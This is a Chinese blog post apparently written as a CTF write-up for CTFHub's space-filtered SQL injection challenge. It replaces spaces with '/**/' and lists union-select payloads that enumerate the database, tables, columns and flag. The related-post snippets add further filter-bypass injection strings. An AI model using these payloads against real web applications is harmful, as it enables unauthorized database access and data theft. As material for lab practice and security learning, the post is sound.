CTFHUB-WEB-SQL注入-过滤空格

最新推荐文章于 2024-05-14 17:59:58 发布

mysmartwish

最新推荐文章于 2024-05-14 17:59:58 发布

阅读量247

点赞数

文章标签： sql 数据库

本文链接：https://blog.csdn.net/weixin_49539962/article/details/132123851

版权

原题

解题思路

题目说了要过滤空格，使用“/**/”可以实现空格注释。

依旧是两个回显：

-1/**/union/**/select/**/1,2

接下来就是常规操作，依次找到数据库名、表名、列名、flag：

数据库名还是sqli：

-1/**/union/**/select/**/1,database()

找表名

-1/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='sqli'/**/limit/**/1

找列名

-1/**/union/**/select/**/1,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema='sqli'/**/and/**/table_name='tqcfzxnkzb'/**/limit/**/1

找flag

-1/**/union/**/select/**/1,group_concat(tdswkltjba)/**/from/**/sqli.tqcfzxnkzb/**/limit/**/1

优惠劵

mysmartwish

关注关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
1
评论
CTFHUB-WEB-SQL注入-过滤空格

题目说了要过滤空格，使用“/**/”可以实现空格注释。
复制链接

扫一扫

WEB渗透学习-XSS-labs靶场

04-20

XSS-labs为WEB渗透中跨站脚本攻击专项练习靶场，内含多种攻击方式，采用关卡制，由易到难，适合刚接触该漏洞的新手巩固练习

超级SQL注入工具-web-sql

10-28

超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具，支持出现在HTTP协议任意位置的SQL注入，支持各种类型的SQL注入 支持Bool型盲注、错误显示注入、Union注入，支持Access、MySQL5以上版本、SQLServer、Oracle...

1 条评论您还未登录，请先登录后发表或查看评论

SQL注入之绕过空格

nihao_ma_的博客

05-07

1880

SQL注入之空格绕过技巧

CTFHub | 过滤空格

尼泊罗河伯的博客

12-04

2349

根据网页显示内容提示，这题关于过滤空格注入，此题和其他的注入手法一致，只不过需要在网页 URL 中对 payload 语句中的空格符号进行过滤，判断发现此题存在过滤空格注入，接着判断字段数量，查看数据库位置和版本。使用注入常用流程爆库、爆表、爆数据。最后获得此题 flag 。

CTFhub-sql注入-绕过空格过滤

ssss39的博客

08-19

348

如果1/**/union/**/select/**/1=1的显示结果与1/**/union/**/select/**/1=2的显示结果不一样，1/**/union/**/select/**/1,2 没有将数据带出来。3 没有回显，说明只用 1，2 这两个。与1的结果一样说明存在注入点。字段名dzkctujmta。

SQL注入-过滤空格

qq_24899063的博客

11-08

1904

SQL注入-过滤空格

CTF学习笔记——SQL注入

xuanyulevel6的博客

08-25

4491

以pikachu靶场练习来学习ctf知识

vue+element-ui+websql

04-19

使用vue+elemetnui框架，采用websql/localsotrage作为数据存储，实现增删改查

计算机-mysql-基于Web应用的SQL注入攻击入侵检测研究.pdf

07-08

计算机-mysql-基于Web应用的SQL注入攻击入侵检测研究.pdf

Secure-Systems-of-SQL-Injection-Attack:具有SQL注入漏洞的安全系统

05-01

恶意文本检测器，约束验证，查询长度验证和基于文本的密钥生成器是用于检测和防止SQL注入攻击访问数据库的四种过滤技术。要求 Web应用程序一台虚拟服务器测试客户封包捕获软件执行我们正在Ubuntu中进行此项目...

86-web漏洞挖掘之SQL注入1

08-03

第一种是模糊查询第二种是in之后的参数第三种是order by之后的参数

CTFHub_技能树_Web之SQL注入——过滤空格

Ho1aAs‘s Blog

12-23

943

文章目录一、过滤空格的绕过二、注入过程Ⅰ、爆表名Ⅱ、爆列名Ⅲ、爆flag 一、过滤空格的绕过一般注入语句为 ?id=0 union select database(),user() 由于过滤了空格致使无法执行注入的语句时，可使用以下字符代替空格，发挥同样效果 ()：一对圆括号 +：加号 %09：TAB换行符的URL编码形式 /**/：块注释符二、注入过程依次尝试发现只能使用块注释符替换，那么开始注入： Ⅰ、爆表名 ?id=10/**/union/**/select/**/1,group_conc

sql 过滤绕过

m0_59855041的博客

06-14

545

20%0a%a0%09%0C%0D%0B()/**/

CTFHub-sql注入

qq_60905276的博客

01-30

5633

1.整数型注入先判断有没有注入点 ?id=1 and 1=1 ?id=1 and 1=2 证明有注入点在输入1看看。有回显。

CTFHub-空格过滤-wp

z1moq的博客

05-18

239

空格过滤 **原理：**在php中提前写好当输入字符中有空格时返回 “Hacker!!!” 来防止sql注入 空格为空字符，可用php中的多行注释/**/来代替空格，以正常执行sql语句剩余做法与整数型注入相同

buuctf 刷题5(sql注入篇)

weixin_63231007的博客

05-10

3890

sql注入挺难的我感觉，但是很重要，有好多绕过，和注入手段需要一步步在尝试，因此本章刷一下buuctf各个sql注入题目，来巩固联系一下自己在sql注入方面的知识。 [极客大挑战 2019]HardSQL 1 输入1',出错，1'#显示不同，存在单引号闭合注入。 order by查字段，union，堆叠注入，和输入数字都烦返回错误 =，空格，和好多关键字都被过滤了。空格用()绕过，=用like绕过。尝试报错注入： 1'or(updatexml(1,concat...

★SQL注入漏洞（7）SQL注入高级篇

weixin_51339377的博客

03-18

1344

分析目标防火墙并且跳过 1.直接拉黑ip类防火墙 2.过滤删除相应字符的防火墙 1.waf注释符号过滤例题：Sqli-labs T23 特点：注释符 --+ # 被过滤掉了绕过方法：逻辑上补全闭合即可多加一次url编码只是更安全的绕过 select * from users where id = '' limit 0,1 select * from users where id = ' -1' union select 1,2,'3 ' limit 0...

数据库SQL编写规范-SQL书写规范整理（SQL语句书写规范全解-Word原件）

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交